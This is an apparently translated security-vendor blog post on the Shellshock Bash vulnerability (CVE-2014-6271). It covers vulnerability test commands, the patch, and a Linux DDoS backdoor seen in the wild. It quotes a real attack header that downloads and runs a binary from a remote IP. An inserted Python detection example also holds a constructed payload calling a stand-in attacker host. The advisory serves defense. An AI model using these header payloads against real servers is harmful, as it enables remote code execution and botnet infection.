
Shellshock vulnerability exploited in the wild

The Shellshock vulnerability (CVE-2014-6271), in its scale and its consequences for the global network and the devices connected to it, can only be compared with the infamous Heartbleed discovered this spring. The name was given to a vulnerability in the Bash command interpreter, which is used in various modifications and distributions of Linux, Unix and Apple OS X (including the latest version, OS X Mavericks), as well as in Android. The vulnerability has been assigned the highest severity level, 10, and all versions of the interpreter, including the latest 4.3, are vulnerable.



The main danger of Shellshock is that it allows remote code execution on a vulnerable OS: the attacker's commands are run by the interpreter. From the exploitation standpoint, this is also quite simple. Bash is commonly invoked by CGI scripts (which is what makes remote exploitation possible), and these run on web servers among other places, for example via the cgi_module component. One of the malicious programs the attackers delivered to compromised servers is detected by ESET antivirus products as Linux/DDoS.M.

Checking whether Bash is vulnerable is simple; the following command can be used for this.

$ env x='() { :;}; echo vulnerable' bash -c "echo completed"


Fig. Demonstration of a vulnerable interpreter on OS X Snow Leopard.

Because the value of the environment variable x begins with the character sequence "() { :;};", which triggers the vulnerability, the interpreter "swallows" the rest of the value and executes it, whereas it should instead report a syntax error.

host@host2 ~ $ env x='() { :;}; echo vulnerable' bash -c "echo completed"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
completed

Fig. Behavior of Bash on Gentoo Linux with the patch applied; the word "vulnerable" is no longer printed.


Fig. The first patch for Linux Ubuntu also contained flaws.

The following command checks whether the system is still vulnerable after the patch has been applied. If the current date is printed, the problem remains.

env X='() { (a)=>\' sh -c "echo date"; cat echo

Once information about this vulnerability appeared, a real-world example of its exploitation was made public: it allowed an executable ELF file to be copied to the server remotely. To do this, attackers can use various HTTP request header fields, which are passed into the CGI script's environment and then executed by the vulnerable version of Bash. An example of one such request header is shown below. Once inside the Bash interpreter, the commands download a file from a remote server and set the required permissions on it.

Cookie: () { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;
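As an added example (not part of the original post), the following Python shows the defensive side of the header-borne attack described above: it walks the headers of a raw HTTP request, flags any whose percent-decoded value starts with the Bash function-definition marker, and extracts the text a vulnerable Bash would have executed. The request samples, hosts, paths and payloads are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Bash's vulnerable importer fires only when the variable's value *starts*
# with the function-definition marker "() {", so anchor the match there
# (leading whitespace allowed) to avoid flagging "() {" buried in a URL.
MARKER = re.compile(r"^\s*\(\)\s*\{")


def shellshock_headers(raw_request: str) -> list[tuple[str, str]]:
    """Return (header name, percent-decoded value) for every header whose
    value begins with the Bash function-definition marker."""
    hits = []
    for line in raw_request.splitlines()[1:]:  # skip the request line
        if not line.strip():
            break                               # end of the header block
        name, sep, value = line.partition(":")
        if not sep:
            continue
        decoded = unquote(value.strip())        # catch "%28%29%20%7B" too
        if MARKER.match(decoded):
            hits.append((name.strip(), decoded))
    return hits


def trailing_command(value: str) -> str:
    """Text after the function body: the part a vulnerable Bash would run."""
    _, _, rest = value.partition("}")
    return rest.lstrip(";").strip()


# Constructed sample requests; hosts, paths and payloads are placeholders.
BENIGN = ("GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.org\r\n"
          "User-Agent: Mozilla/5.0\r\n\r\n")
# "() {" appears inside a URL, not at the start of the value: not a hit.
JS_LIKE = ("GET /cgi-bin/status HTTP/1.1\r\n"
           "Referer: http://www.example.org/?cb=function()%20{%20}\r\n\r\n")
ATTACK = ("GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.org\r\n"
          "Cookie: () { :; }; wget -O /tmp/besh http://attacker.example/nginx;"
          " chmod 777 /tmp/besh; /tmp/besh;\r\n"
          "User-Agent: () { :;}; echo vulnerable\r\n\r\n")
ENCODED = ("GET /cgi-bin/status HTTP/1.1\r\n"
           "Referer: %28%29%20%7B%20%3A%3B%7D%3B%20/bin/id\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("benign", BENIGN), ("js_like", JS_LIKE),
                       ("attack", ATTACK), ("encoded", ENCODED)]:
        for name, val in shellshock_headers(req):
            print(f"{label}: {name} -> {trailing_command(val)}")
```

The same check can be run over a web server's access log or a WAF rule set, as long as header values are percent-decoded before matching.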

The Linux malware that we observed in this campaign consisted of bots that give the attackers remote access to the compromised server (a backdoor) and that also specialize in carrying out DDoS attacks. Three known modifications of this malware are detected by our AV products as Linux/DDoS.M.

To obtain security updates for this vulnerability for Linux distributions, use the following links.


We recommend using the updates for the respective products and installing them as soon as possible.

Stay secure.

Source: https://habr.com/ru/post/238257/
